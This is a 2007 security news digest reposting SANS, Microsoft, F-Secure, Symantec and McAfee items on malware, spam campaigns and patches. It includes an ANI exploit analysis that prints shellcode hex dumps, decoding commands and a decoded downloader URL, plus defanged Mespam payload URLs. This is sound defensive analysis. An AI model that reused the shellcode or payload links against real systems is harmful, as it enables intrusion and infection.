Chris Mosby at myITforum.com

Virus detection - vector vs. payload

Published: 2007-05-30,
Last Updated: 2007-05-30 10:04:41 UTC
by Daniel Wesemann (Version: 1)

In a previous diary, we've written about the surprising prevalence of those exploit "iframes" which in the end download a file called "funny.php" off a server in Russia, Panama or Ukraine, etc. "funny.php" is an EXE sailing in disguise, and usually a
password stealing spyware of the "Bancos" family. The file changes frequently and cleverly enough to keep the majority of anti virus products perpetually in the dark. The only two things that tend to "save the day" if a user happens across one
of these IFRAMEs is that firstly, the vulnerabilities exploited are pretty old (and patched). Secondly, the anti-virus detection for the exploit iframe (the infection "vector") is significantly better than detection for the spyware (the "payload").

Some anti virus products apparently trigger on the "obfuscation" of the exploit, (it is encoded Javascript), risking a higher false positive rate by doing so, but also making it less likely that a tiny change in the exploit code renders the signature useless. Others apparently trigger on the exploit itself. The obfuscation and exploits used have been pretty much the same for the past three months, so one would reasonably expect anti virus coverage to be well in place.

When today a user of mine "found" another one of these funny.phps, I decided to pass both the vector and payload files through Virustotal to see who was up to snuff:

Virustotal results for the obfuscated exploit file ("forum.php")

Virustotal results for the payload ("funny.php")

The results speak for themselves, with quite a few prominent vendors competing for the coveted "Sees No Virus" award :). I'm constantly amazed at how anti-virus ever could grow into a multi-billion dollar industry.

Source: SANS Internet Storm Center; Cooperative Network Security Community - Internet Security - isc

********************************************************************

Title: Microsoft Security Bulletin Minor Revision

Issued: May 31, 2007

********************************************************************

Summary

=======

The following bulletin has undergone a minor revision increment.

Please see the appropriate bulletin for more details.

* MS07-029

Bulletin Information:

=====================

* MS07-029

- http://www.microsoft.com/technet/security/bulletin/ms07-029.mspx

- Reason for Revision: Bulletin revised. File Information updated for Windows Server 2003. Clarification added throughout the bulletin for server configurations that may require the installation of DNS functionality as a prerequisite for the security update installation.

- Originally posted: May 8, 2007

- Updated: May 31, 2007

- Bulletin Severity Rating: Critical

- Version: 1.1

********************************************************************

Quicktime Security Update for 7.1.6 (Yes, really!)

Published: 2007-05-29,
Last Updated: 2007-05-29 23:29:45 UTC
by Joel Esler (Version: 2)

/** Hope you Windows guys have better luck with this update than other Apple Updates in the past **/

UPDATE:  Alot of people have written in telling us that 7.1.6 is the current version and there are no other updates.  Yes, 7.1.6 IS CURRENT.  This is a security update FOR 7.1.6 as indicated in the subject.  Please see: http://www.apple.com/support/downloads/ you will see that there ARE Security Updates.

http://docs.info.apple.com/article.html?artnum=305531

Security Update (QuickTime 7.1.6)

QuickTime

CVE-ID: CVE-2007-2388

Available for: QuickTime 7.1.6 for Mac OS X and Windows

Impact: Visiting a malicious website may lead to arbitrary code execution

Description: An implementation issue exists in QuickTime for Java, which may allow instantiation or manipulation of objects outside the bounds of the allocated heap. By enticing a user to visit a web page containing a maliciously crafted Java applet, an attacker can trigger the issue which may lead to arbitrary code execution. This update addresses the issue by performing additional validation of Java applets. Credit to John McDonald, Paul Griswold, and Tom Cross of IBM Internet Security Systems X-Force, and Dyon Balding of Secunia Research for reporting this issue.

QuickTime

CVE-ID: CVE-2007-2389

Available for: QuickTime 7.1.6 for Mac OS X and Windows

Impact: Visiting a malicious website may lead to the disclosure of sensitive information

Description: A design issue exists in QuickTime for Java, which may allow a web browser's memory to be read by a Java applet. By enticing a user to visit a web page containing a maliciously crafted Java applet, an attacker can trigger the issue which may lead to the disclosure of sensitive information. This update addresses the issue by clearing memory before allowing it to be used by untrusted Java applets.

(Information came from Apple's website)

Source: SANS Internet Storm Center; Cooperative Network Security Community - Internet Security - isc

Better Business Bureau targeted malware spam

Published: 2007-05-25,
Last Updated: 2007-05-25 22:54:35 UTC
by Bojan Zdrnja (Version: 1)

We are receiving more reports about targeted attacks claiming to be from the Better Business Bureau. The spam always comes with an RTF attachment. Does this ring a bell? If you’re a frequent reader of ISC you might remember that I already post an analysis of such an attack back in March – you can find it here: http://isc.sans.org/diary.html. BBB also posted an alert about this quite a while ago (http://www.bbb.org/alerts/article.asp).

Basically the attackers use an application called Object Packager to embed an executable in a RTF document. The executable is typically a downloader which, when executed, downloads a second stage malware. The attackers keep changing both the downloader and second stage malware, together with sites they are using. It is worth pointing again that this attack does not exploit any Office vulnerability; instead it relies on social engineering (see the screenshots in the old diary).

While the attack itself is not very interesting, what is interesting is that the spam e-mails carrying this seem to be targeted. In fact, almost all reports we’ve received lately (and Sunbelt blogged about the same thing at http://sunbeltblog.blogspot.com/2007/05/seen-in-wild-extremely-dangerous-better.html) claimed that only couple of users in attacked organizations received this and that they were almost always CEOs or CFOs.

So what can we do here? As you can see from my old diary, AV detection of embedded objects in RTF documents seems to be very weak. The detection of the downloader I extracted at that point in time was a bit better but this was still far away from perfect, especially when we’re talking about the last line of defense – the AV program on the desktop machine.

If possible, you can block RTF files on your e-mail gateways, but this might have a counterproductive effect as we’ve been encouraging users for years to use “more friendly” text formats such as RTF (and who thought that objects can be embedded this easily in them).

As always, the best defense here is user education. Besides general awareness, it might be good to warn your users (especially the C*O levels) about this particular attack as it does rely purely on social engineering (the user has to confirm that he wants the executable opened).

Source: SANS Internet Storm Center; Cooperative Network Security Community - Internet Security - isc

Cross-Platform OpenOffice Virus Proof of Concept

Published: 2007-05-24,
Last Updated: 2007-05-24 20:08:18 UTC
by John Bambenek (Version: 1)

A virus writer sent a proof-of-concept virus called BadBunny to Sophos that uses vulnerabilities in OpenOffice to infect Windows, Linux and Mac OS X. Depending on the host operating system, the virus will perform different actions to infect the target machine. In this case, it downloads a lewd image of a scantily clad woman and a dude in a big ol' bunny suit. It's not the first or last attempt at such cross-platform virus writing (or the inclusion of bizarre graphics in malware) but the limitation of seeing much of this cross-platform work lies in the fact that few applications are widely deployed and run on multiple operating systems. Few people use OpenOffice (in comparison to MS Office) to make it worth the while of a would-be attacker looking for anything other than bragging rights. However, viruses are possible for a variety of operating systems (yes, including Mac OS X) and the day may come when those users will have to be just as vigilant as those on Windows.
--
John Bambenek / bambenek {at} gmail [dot] com
University of Illinois at Urbana-Champaign

Source: SANS Internet Storm Center; Cooperative Network Security Community - Internet Security - isc

Check this one out, its the one we have been waiting for!

********************************************************************

Title: Microsoft Security Advisory Notification

Issued: May 22, 2007

********************************************************************

Security Advisories Updated or Released Today ==============================================

* Microsoft Security Advisory (927891)

- Title: Fix for Windows Installer (MSI)

- http://www.microsoft.com/technet/security/advisory/927891.mspx

- Revision Note: Advisory published: May 22, 2007

********************************************************************

Ok this is NOT good.  Good catch Donna!! 

Symantec AntiVirus cannot detect viruses after you install a hotfix

Symantec AntiVirus cannot detect viruses after you install a hotfix on a computer that is running Windows Server 2003 or Windows XP SP2

You install a hotfix on Microsoft Windows Server 2003 or on Microsoft Windows XP Service Pack 2 (SP2). However, after you install the hotfix, Symantec AntiVirus cannot correctly detect viruses in encrypted files that reside on a network share or in a document library.

This problem occurs if you have installed the hotfix that is described in the following Microsoft Knowledge Base article:
922582 (http://support.microsoft.com/kb/922582/) Error message when you try to update a Microsoft Windows-based computer: "0x80070002"

This problem occurs if the following conditions are true:
• A legacy filesytem filter driver is installed on the same computer as Symantec AntiVirus. 
• The legacy filesystem filter driver is configured to encrypt files that are stored on network shares. 

http://support.microsoft.com/default.aspx?scid=kb;en-us;933215
http://support.microsoft.com/kb/922582/

Published Monday, May 21, 2007 6:18 PM by donna

Source: Symantec AntiVirus cannot detect viruses after you install a hotfix - Donna's SecurityFlash

Analyzing an obfuscated ANI exploit

Published: 2007-05-22,
Last Updated: 2007-05-22 07:17:54 UTC
by Bojan Zdrnja (Version: 2)

Some time ago one of our readers, Andrew, submitted an interesting ANI exploit sample. Unless you’ve been under a rock for the last couple of months, you heard about the latest ANI vulnerability.

Most of the exploits we’ve seen so far (and we’ve seen thousands of them) didn’t try to obfuscate the exploit code. The exploit code itself almost always contained a downloader that downloaded the second stage binary from a remote site and executed it on the victim’s machine.

As the exploit wasn’t obfuscated, running a simple string commands was enough to see the URL of the second stage binary. So, in order to see the second stage binary, Andrew ran the strings command on the new ANI exploit, however, this time no URL was present:

$ strings 123.htm
RIFF
ACONanih$
…
jvvr<1142;03820940:21921PQVGRCF0GZG
IgvRtqeCfftguu

Those experienced analysts amongst you will immediately notice the string starting with jvvr< and will comment that this must be a XOR-ed URL (http://something). In other words, it appears that this exploit is obfuscating the target URL. Andrew came to the same conclusion and tried to crack the XOR code.

If you try to XOR jvvr to get http, you will see that the correct XOR value is 0x02. The easiest way to do this is to use a nice little utility by Didier Stevens called XORSearch (http://didierstevens.wordpress.com/programs/xorsearch/). This utility allows you to brute force a file in order to find a XOR key for any string in the file. So I downloaded the utility and ran it on the ANI exploit sample and indeed, the correct XOR value for the http string is 0x02, but the rest of the URL was still not there:

D:\>XORSearch.exe 123.htm http
Found XOR 02 position 01FB: http>3360921:02;62803;03RSTEPAD2EXE

We can see something at the end as well that looks like notepad.exe. This means that the URL is either XOR-ed with multiple keys or some other obfuscation is used. At this point you have couple of options: you can play with brute forcing, you can infect a goat machine and just see what happens (it’s easy enough to capture network traffic of a goat machine and see what the target URL is) or you can try to analyze the exploit code itself – and that’s what we’ll do.

The trick with the latest ANI exploit was that the two bytes after the “anih” section define how many bytes are to be copied. As the vulnerable function reserved only 36 bytes on the stack it was easy to cause a buffer overflow (I won’t go into details now but the first section copy function was patched previously). So, let’s see what we have in this file:

$ xxd 123.htm
0000000: 5249 4646 0004 0000 4143 4f4e 616e 6968 RIFF....ACONanih
0000010: 2400 0000 2400 0000 ffff 0000 0a00 0000 $...$...........
0000020: 0000 0000 0000 0000 0000 0000 0000 0000 ................
0000030: 1000 0000 0100 0000 5453 494c 0300 0000 ........TSIL....
0000040: 1000 0000 5453 494c 0300 0000 0202 0202 ....TSIL........
0000050: 616e 6968 a803 0000 0b0b 0b0b 0b0b 0b0b anih............
0000060: 0b0b 0b0b 0b0b 0b0b 0b0b 0b0b 0b0b 0b0b ................

We sure have two anih section. The buffer size of the second section (highlighted above) is 0x03a8 which is actually 936 bytes – right to the end of the file. We can also see that this section starts with a lot of 0x0b bytes. After a bunch of 0x0b bytes we can see something that looks like real code:

00000a0: 0b0b 0b0b 0b0b 0b0b 17a2 4000 0b0b 0b0b ..........@.....
00000b0: 0b0b 0b0b 0b0b 0b0b 0b0b 0b0b 0b0b 0b0b ................
00000c0: 31c9 6681 c138 02eb 035e eb05 e8f8 ffff 1.f..8...^......
00000d0: ff83 c609 802e 0246 e2fa ea02 0202 025f .......F......._
00000e0: 83ef 2f14 4202 ea8a 0302 028f 872b 1542 ../.B........+.B
00000f0: 02ea 0202 0277 746e 6f71 7030 666e 6e02 .....wtnoqp0fnn.

So what we’ll do now is take this code and disassemble it. It looks like the real code starts at 0x00000c0, so let’s get rid of everything before that:

$ dd if=123.htm of=code ibs=1 skip=192

Now there are various ways on how to disassemble this. If you are lucky and have a license for IDA Pro you can just load this file into it (actually, you can even load the 123.htm file and then manually tell IDA Pro to start disassembling the code around 0x00000c0). As I really like OllyDbg, I tend to do everything with it but in order to load this code into OllyDbg we have to create a PE file. The process now is same as when you analyze a shellcode so the easiest way is to use iDefense’s Malcode Analysis Pack and its Shellcode2Exe utility (http://labs.idefense.com/software/malcode.php#more_malcode+analysis+pack).

Once you’ve done this you will have an executable file with proper sections and headers that actually executes your code. This is how it looks in OllyDbg:



So what do we have here? The real code starts at 0x00401020. It first zeroes the ECX register (the XOR command) and adds 0x238 to it. Then it does couple of jumps and a CALL in order to get the address of the ADD ESI,9 instruction into the ESI register. This is a standard method to get the code address into a register (a CALL instruction followed by a POP instruction). The code skips 9 bytes and then loops for next 0x238 bytes. In the loop, each byte is decreased by 0x02! Aha, so this is how they obfuscated it – the code modifies itself completely (both the URL and the actual code).

You can now execute this in OllyDbg and see what happens (you will have to set a breakpoint after the loop and then tell OllyDbg to re-analyze this section). Or, if you are just interested in the final URL, we can use perl to subtract 0x02 of every byte in this file:

$ perl -pe 's/(.)/chr(ord($1)-0x02)/ge' < code > final

$ strings final
urlmon.dll
URLDownloadToFileA
c:\boot.inx
c:\boot.inx
LoadLibraryA
WinExec
ExitProcess
http://[REMOVED].72.80/70/NOTEPAD.EXE
GetProcAddress

And here we are! You can see that the code loads urlmon.dll, uses URLDownloadToFileA() function to download the URL at the bottom and saves this as c:\boot.inx.

Luckily, the AV vendors where on the ball this time – almost all AV vendors detected the ANI file properly (I do wonder if they had specific signatures for this or used a generic/heuristic one).

UPDATE

Just as I wrote that almost all AV vendors detected this sample properly, it looks like some are raising false positives as well.

We received several e-mails from our readers stating that Norton Internet Security (Symantec) detects this diary as an intrusion (“HTTP ANI File Anih Hdr Size BO”) and as a result blocks access to the diary, no matter what browser you’re using.
This is clearly a false positive as there are no ANI files in the diary (just one PNG screenshot of OllyDbg):

$ file ollyani.PNG
ollyani.PNG: PNG image data, 689 x 513, 8-bit/color RGB, non-interlaced

My guess is that they must be triggering on the hexdump or the ASCII part of it. If you are running an affected version of Symantec and have some time to play with it, it would be interesting to see what exactly triggers this – let us know if you figure this out.

Bojan

Source: SANS Internet Storm Center; Cooperative Network Security Community - Internet Security - isc

********************************************************************

Title: Microsoft Security Advisory Notification

Issued: May 21, 2007

********************************************************************

Security Advisories Updated or Released Today ==============================================

* Microsoft Security Advisory (937696)

- Title: Release of Microsoft Office Isolated Conversion Environment (MOICE) and File Block Functionality for Microsoft Office

- http://www.microsoft.com/technet/security/advisory/937696.mspx

- Revision Note: Advisory Published: May 21, 2007

********************************************************************

And you can take that to the .bank
Posted by Mikko @ 07:59 GMT

---

We've been pushing for an initiative to get a secure top-level domain (like ".bank" or ".safe") for some time now. See this post for original context.

We've received lots of questions and also plain criticism over the whole idea – most notably, in Slashdot as well as from Larry Seltzer in his prominent blog.

So let me collect the most typical challenges to the idea, and answer them.

A new top-level domain will not solve the phishing problem once and for all, so it's not even worth considering.

This is not a silver bullet. A new top-level-domain (TLD) would not be the end of the phishing problem. But it would be a helpful top-level domain and it would stop a particular subset of phishing completely.

But .com works just fine!

Today anybody can get a .com domain with a fake name and fake address, with a fake credit card. That's just fine with everybody? Don't we really need a TLD where you could actually trust that you know who owns the domain?

Phishers could still create realistic-looking fake domains. For example a look-a-like for www.citi.bank could be www.citi.bank.account.yadayada.com.

Yes, phishers would still be able to do this; this new top-level-domain would not be able to do anything to stop this problem. Same thing with masked html links.

People are stupid and would not notice such a new address scheme.

The main point of such a new TLD would not be that users would suddenly get a clue and would learn to read the web addresses correctly (although for those who do read the URLs, this would be obviously be an improvement). The main point is that it would allow the users' software to work better. Security software and browser toolbars would essentially have a "white list" to work with.

What about security researchers?

This would make life easier for security researchers to figure out which sites are not phishing sites. This really isn't as obvious as it sounds, as banks themselves use tons of different domains. We often spend precious time trying to confirm whether a particular phishy-sounding domain really belongs to a real bank or not.

Small banks and/or credit unions couldn't afford it.

Small banks are not currently the ones losing the most money. It's the big banks. And the domain doesn't have to be ".bank" literally. The TLD could be along the lines of .account, .verified, .safe, et cetera. It would be a TLD for "big players" that deal with lots of money. PayPal or eBay come to mind. And yeah, PayPal isn't a traditional bank but they certainly do get phished. They might want to have a secured TLD for account access.

Organized online criminals could afford to buy .bank domains for $50,000.

Only if they can prove that they are a real bank. And they would not be able to register misleading domain names. And in the worst case, a rogue domain would be shut down quickly. The possibility of losing their investment in registering such a domain wouldn't be worth the risk for criminals.

What about .pro?

The .pro TLD does validate who gets the domains, but it's targeting a different audience (individual professionals like doctors and lawyers).

Extended Validation (EV) certificates largely address the same issues.

We're not against these new high-security web certificates. However, a secure top-level domain would still be a good idea: it would authenticate the domain as trusted by the name alone. There's no way to know if a site has a high-security certificate without visiting it.

Banks don't deserve their own domain.

We already have a TLD for airlines (try www.nw.aero) and museums (try the.british.museum). Isn't it a bit odd we don't have one for banks? Although they are the ones that get attacked all the time?

Would this be a global domain?

Probably. Then again, nothing prevents local governments from setting up domains like .bank.uk, .bank.jp, .bank.au in their own jurisdictions.

Would it work?

Yes: in the end there probably would be no rogue sites under such a new TLD. They would be elsewhere.

There are no rogue sites on .gov domain names. Why? Because you can only get a .gov domain if you really are a US governmental organization. Or how about .fi? The .fi (Finland) domain has very few malicious websites. Why is that? Because the registration process involves mailing a verification code to a physical mailing address. Just that extra step makes it less convenient to use for the bad guys. With all the extra verifications steps that we would have in the registration of a .bank domain, scammers just wouldn't be able to do it.

Ok, I'm convinced. What's next?

This initiative won't move further until we find a sponsoring organization that starts to push it and proposes it officially to ICANN. This sponsoring organization is what we are trying to find at the moment.

This piece was crossposted with Foreign Policy blog.

Source: F-Secure : News from the Lab

Mespam meets Zunker (and targets German users)

“Whenever I post my computer puts something on the end of my post that I didn't type. Just look, it's that link and the text know will appear when I post this. P.S.Look,Super sreensaver! :)) …”

I wanted to start this blog by quoting a post picked up from one of the many forums contaminated by Mespam to show exactly what infected users experience without having a clue of what’s going on with their computer. If your friends are complaining that your e-mails, blog posts and chat sessions show a suspicious URL linking to photos, jokes or screensavers that you hadn’t sent them, you’re probably another victim of this Trojan.

Trojan.Mespam was originally spotted in February and we described here the new spreading technique, which uses an LSP component to attach text and malicious links to the outgoing HTTP traffic. In the Web 2.0 world this technique has proven its efficiency. It’s worth mentioning that Mespam was distributed via the Trojan.Peacomm P2P network.

In the last few months we’ve seen many recompiled variants of this Mespam coming out, and I’m reporting here some of the malicious URLs that users should absolutely never click, even if they seem to be posted by trusted friends. We have noticed that each outbreak of Mespam has a main “theme” in the spammed messages, such as postcards, jokes, screensavers, and photos, which is configured by a remote C&C center. When we examine the languages of contaminated forums and blogs, it looks like some infections are localized only to specific countries.

February – The “Jokes” malicious URLs series:
 hxxp://jokeonlineworld.com
 hxxp://practicaljokeonline.com
 hxxp://dailyjokeonline.com

March – The “Screensavers” malicious URLs series:
 hxxp://screensavers4us.info/funscr/silly_bear32_funny.scr
 hxxp://webcounterstat.info/screensavers/wallpapers_gold_bear_b.scr

April – The "Sex-game" malicious URLs series:
 hxxp://www.vixen-toys.com/download/sex-game-3.801.zip
 hxxp://www.marketing-know-how.com/just/sex-game-3.801.zip
 hxxp://fruitsinsuits.com.hk/images/flyers/sex-game-3.801.zip

May – The "foto" malicious URLs series (only targeting Germans?):
 hxxp://www.lastik.com/images/foto.exe
 hxxp://www.ultimatexpressions.co.uk/foto.exe
 hxxp://www.arborwood.com/images/foto.exe

With some help from Google I’ve searched forums, blogs and web boards for the keywords included in the spam messages, to estimate how many forums and sites contain infected posts. The results shown in this table were not optimistic. We should mention that Mespam also spreads through IM, traditional e-mail and web mail, so we’re not considering in this statistic all the messages spammed, for example via Gmail, Yahoo Mail, ICQ, AIM, etc.

(*) – the keyword includes all the links spammed for the “screensaver” series

But who controls what the infected bots spam, and where? This diagram shows some Mespam code on the right and a C&C interface on the left.

The interface on the left is also known as “Zunker” and is a C&C web panel that controls Mespam bots The connections between Mespam code and the Zunker panel are obvious. We have many other clues that they are just different pieces of the same thing. With this panel, the botmaster has quick statistics on the number of infected hosts, affected countries, new bots added recently, and can also see which channels, such as IM, traditional mail, webmail, and forums, are used to send spam.

The configuration area of the panel gives the botmaster the ability to choose a different template message for each channel. This is an example of a configured template found on one of the many Zunker interfaces analyzed recently.

When the botnet becomes big enough, the botmaster can use it to infect more hosts or eventually install a secondary Trojan on the infected machines. This secondary file is always configured from the Zunker interface, and is usually a bank Trojan or DDoS threat. In some cases, after the botnet is ready, the botmaster tries to sell this “install-a-Trojan” service to other cyber-criminals who can decide which Trojan to distribute on the infected hosts.

For example, we’ve seen a file named “ebr9.exe” on a Zunker botnet, which from the panel statistics was targeting mostly German users. This Trojan drops the BHO file “%SYSTEM%\console32.dll” and tries to hijack the execution of the following German programs by changing the registry key “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Option” for each of them:

Banking.exe
BankingUpdate.exe
Erinnerung.exe
GetOn4uHdWID.exe
MG.exe
MGBSE.exe
Mnyupdate.exe
Msmoney.exe
Netviewer.exe
Nv_o2o_Teilnehmer_DE.exe
Salv.exe
Sanitize.exe
SCRSetup.exe
Smkonv.exe
StartStarMoney.exe

The reason for this registry key change is unclear, but German users who have these specific programs should double-check their machines for this Trojan.

We don’t know if the Zunker interface was created together with Trojan.Mespam, or if it was added later by someone else. The current statistics of Mespam samples show that there’s a specific Zunker web panel link hardcoded in every different version of Trojan.Mespam DLL. So probably the package Mespam/Zunker is sold together on the underground market.

Posted by Elia Florio on May 18, 2007 03:13 PM

Source: Symantec Security Response Weblog: Mespam meets Zunker (and targets German users)

********************************************************************
Title: Microsoft Security Bulletin Minor Revisions
Issued: May 17, 2007
********************************************************************

Summary
=======
The following bulletins have undergone a minor revision increment. Please see the appropriate bulletin for more details.

* MS07-025
* MS07-023

Bulletin Information:
=====================

* MS07-025

- http://www.microsoft.com/technet/security/bulletin/ms07-025.mspx
- Reason for Revision: This Bulletin has been revised due to new issues discovered with the security update as reflected in Microsoft Knowledge Base Article 934873
- Originally posted: May 8, 2007
- Updated: May 17, 2007
- Bulletin Severity Rating: Critical
- Version: 1.2
* MS07-023

- http://www.microsoft.com/technet/security/bulletin/ms07-023.mspx
- Reason for Revision: This Bulletin has been revised due to new issues discovered with the security update as reflected in Microsoft Knowledge Base Article 934233
- Originally posted: May 8, 2007
- Updated: May 17, 2007
- Bulletin Severity Rating: Critical
- Version: 1.2
********************************************************************

********************************************************************
Title: Microsoft Security Bulletin Minor Revisions
Issued: May 16, 2007
********************************************************************

Summary
=======
The following bulletins have undergone a minor revision increment.
Please see the appropriate bulletin for more details.

* MS07-027
* MS07-025
* MS07-023

Bulletin Information:
=====================

* MS07-027

- http://www.microsoft.com/technet/security/bulletin/ms07-027.mspx
- Reason for Revision: Bulletin revised due to an incorrect file name in Arbitrary File Rewrite Vulnerability - CVE-2007-2221 killbit table; A new issue discovered with the security update: 937409 The "File Download - Security Warning" dialog box opens when you try to open Internet Explorer 7; Updated file names for Internet Explorer 7
- Originally posted: May 8, 2007
- Updated: May 16, 2007
- Bulletin Severity Rating: Critical
- Version: 1.2
* MS07-025

- http://www.microsoft.com/technet/security/bulletin/ms07-025.mspx
- Reason for Revision: Bulletin workarounds section updated, with the removal of the "Use Microsoft Word Viewer 2003 to open and view files" workaround. This workaround is not valid for the vulnerability discussed in this security bulletin.
- Originally posted: May 8, 2007
- Updated: May 16, 2007
- Bulletin Severity Rating: Critical
- Version: 1.1
* MS07-023

- http://www.microsoft.com/technet/security/bulletin/ms07-023.mspx
- Reason for Revision: Bulletin "Installation File Information" section updated with the correct file name for the Office 2007 Compatibility Pack.
- Originally posted: May 8, 2007
- Updated: May 16, 2007
- Bulletin Severity Rating: Critical
- Version: 1.1
********************************************************************

New For-Profit Symbian Trojans
Posted by Jarno @ 12:46 GMT

---

Yesterday we received a couple interesting cases from our partner. Three new for-profit SMS trojans that affect Symbian S60 2nd Edition and older devices.

The Viver family of trojans claim to be utility programs for Symbian phones. They have been uploaded to at least one popular file sharing site in the hopes that people will download and install them.

After installation, the Viver trojans immediately start sending SMS messages to premium-rate numbers. The messages are sent with proper international area codes, so they are able to reach the correct destination even when activated outside Russia.

We've already seen for-profit malware in mobile devices: Wesber.A and Redbrowser are Java Midlet trojans that try to send messages to Russian premium-rate numbers. But these trojans require user acceptance per each message and are able to send messages correctly only inside Russia.

But as the Viver family is more advanced and is able to operate anywhere, we find this development worrisome. Prior to 2003 there was little for-profit malware on the PC platform, and now almost all malware is written for one or other profit motivation. It is very likely that more for-profit malware will also appear on mobile platforms.

All three Viver variants are detected with F-Secure Mobile Anti-Virus.

For more information on Viver see Viruslist.com's: Analyst's Diary.

Source: F-Secure : News from the Lab

Downloader-BBS: The Italian Job

Thursday May 17, 2007 at 4:35 am CST
Posted by Vinoo Thomas

Trackback

McAfee Avert Labs encountered a spam run yesterday specifically targeting individuals in Italy by using a social engineering technique. The spammed email worded in Italian appears to be from the Italian Police warning users that they have evidence that pirated mp3 files were found to be downloaded on their computer. The email has been craftily worded and looks convincing enough for duping recipients that the mail is genuine. A copy of the spammed email is as follows:

Except that makes you wonder: since when did the RIAA team up with the Italian police?

Such targeted attacks on specific countries or communities are becoming more and more frequent. German internet users must be sick of weekly spam runs of the Downloader-AAP trojan with similar social engineering themes. A typical spam run lasts for a few hours and is usually seeded from a botnet of infected computer. Malware authors typically create a single use disposable trojan and test it against detection by popular antivirus vendors tweaking them until it becomes undetected. This gives the trojan a better shelf life in the wild in order to evade proactive detection by anitivirus software. Next time a spam run is executed, a new variant is used and this vicious cycle continues. It is also observed that the same binary is never used again in another spam run.

The mass spammed Downloader-BBS sample in this case arrives in a password protected archive with the password specified in the message body. Once executed it downloads a dialer program designed to connect to a premium-rate number from a remote web server based in Russia.

You would think most folks would be wary of opening a password protected attachment and inputting the password to execute the payload. But with millions of newbie users using the internet, morbid curiosity will always get the better of someone who is receiving such a type of email for the first time.

Detection for this threat is already available in the beta dats and will released in today’s 5033 DATs.

This entry was posted on Thursday, May 17th, 2007 at 4:35 am and is filed under Malware Research, Spam and Phishing. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.

Source: Computer Security Research - McAfee Avert Labs Blog

DDoS Attacks on Finnish Sites
Posted by Sean @ 12:01 GMT

---

There has been several DDoS attacks targeted at Finnish websites this week. Targets have included the Finnish Broadcasting Company and the largest newswire in Finland. Several weblog readers have been asking for our take on this.

The attacks have been keeping us quite busy. Since we're working with the authorities, any insider details will have to wait until a later date as investigations are ongoing. So that's one of the reasons why little is mentioned here.

For general details English readers can read more about what's been going on from HS.fi, STT and YLE: 1, 2, 3.

Source: F-Secure : News from the Lab

An experiment in using sponsored ads for malware

Thursday May 17, 2007 at 2:25 am CST
Posted by Allysa Myers

Trackback

After last month’s excitement with the sponsored ads on Google being used to steal bank passwords, a security researcher named Didier Stevens discussed an experiment he’d been running, to see how much traffic he could get using this same sort of tactic, with sort of a reverse social-engineering tactic: He set up an ad that promised to infect your computer upon clicking the link.

In this case, the site was actually harmless, but over 400 people did in fact click the link. My guess is that there was probably a lot of curiosity about what an actual virus infection “looks” like. I also wonder what percentage were clicks from people using browsers or OSes they consider to be immune to such things - I suspect a notable number. Something akin to people driving less cautiously around bicyclists who wear helmets, since they consider those bikers to be better protected.

Source: Computer Security Research - McAfee Avert Labs Blog

When Good Intentions Go Bad

The use of self-propagating programs for legitimate purposes is one of those ideas that just refuses to die.

In the 1978, researchers at Xerox Palo Alto Research Center (PARC) created worms that performed tasks that included system monitoring and wake up calls. However, in one case, the Xerox PARC ‘good’ worms that were supposed to run on a small set of machines, instead replicated uncontrollably across the network and started crashing machines. Fortunately, the Xerox PARC researchers had an independent termination mechanism in the worm that enabled them to kill all copies of the worm on the network. Unfortunately, they still had 100 dead machines.

Since then, others have proposed using ‘good’ worms for purposes such as compressing all files on a network, battling against ‘evil’ worms, patching vulnerabilities, and looking for ways around Internet censorship systems.

Unfortunately, people occasionally put these theories into practice.

Recently, we added detection for W32.Uisgon.A. The author of W32.Uisgon.A appears to have been a computer science student who wanted to collect samples of viruses that were being brought into his college by USB sticks.

So he wrote a program that copies suspected virus samples to a Windows share and a ‘good’ worm to propagate his program. The worm copies itself to network shares and USB sticks and runs the sample collector from a remote Windows share.

Eventually, he intended to terminate the worm by replacing the sample collector on the Windows share with a fixtool.

However, his design resulted in the worm infecting machines outside his university and well beyond his control. In particular, USB sticks weren't just plugged into computers within his university network, but computers outside the university as well causing his worm to spread uncontrollably. Once the worm began spreading outside the university he had no way to terminate them as he had no way of accessing them.

The end result is a ‘good’ worm that is infecting computer networks in-the-wild and is no better than the ‘bad’ worms it was supposed to catch.

The student has written a long apology about his mistake. Partially translated from Chinese, he wrote:
"I created it only to help teachers clean up viruses and perform research... I was unable to control its self-destruction, and it has brought trouble for many people and has not been a good influence, for this I am deeply ashamed of myself. I hope everybody can forgive my error!"

Unfortunately, his apology is too late as the worm now has a life of its own. Debate has gone on for a number of years about 'good' worms, but Symantec considers that term to be an oxymoron. A worm is a worm and by its nature of self-replication, we considered them malicious. This student didn't need self-replication; if he had the authority to run his code on all those machines, he could have installed his file gathering program on each machine and achieved the desired result.

Instead, he just added one more worm into the world, the exact problem he was trying to solve.

Posted by Paul Mangan on May 16, 2007 05:55 PM

Source: Symantec Security Response Weblog: When Good Intentions Go Bad

ANS and Security Bulletin Updates

Hello everyone,

This is Mark Miller again to let you know about some additional changes we are making this month. In April, we announced changes to our blog site. This month we are announcing changes to our Advanced Notification Service (ANS) as well as some changes we are planning to make to the format of our security bulletins in June.

ANS changes:

As you know, the Thursday before Tuesday’s normal security update release, we send out an advanced notification letting you know what platforms are going to be impacted by the security updates and the maximum severity rating. The information is currently grouped and rolled up by platform (Windows, Office, etc.). This was implemented based on customer feedback that more time and information was needed to plan for testing and deployment. We’ve received positive feedback on the ANS, but customers have also told us that additional information would be even more helpful. Based on that, we are incorporating additional detail about the upcoming security updates. We plan to implement this change with June’s ANS release on Thursday, June 7.

The new ANS is essentially a subset of the monthly bulletin summary we publish the second Tuesday of each month. As such, the ANS will now be published at the same URL used for that months security bulletin summary page (example below). For those not familiar with the monthly bulletin summary, it is a high level overview of the bulletins released for a given month that includes a list of bulletins, severity rating, impact, affected software, download locations for the updates, general deployment information and a single list of acknowledgements thanking those who have practiced responsible disclosure in reporting the vulnerabilities the bulletins address. Moving forward, the ANS subset will contain the following for each bulletin and not be grouped by just the platform:

· Maximum Severity Rating

· Impact of Vulnerability

· Detection information

· Affected Software

Once the security bulletins are released on the second Tuesday of the month, the bulletin summary page will be updated with complete details. For reference, the bulletin summary for May can be found here: http://www.microsoft.com/technet/security/bulletin/ms07-may.mspx.

The old location of the ANS will now become a simple landing page describing the service and the monthly bulletin summary page will serve as the ANS. For June, the ANS will be located here when its published on the 7th at 10:00 AM Pacific time: http://www.microsoft.com/technet/security/Bulletin/ms07-jun.mspx

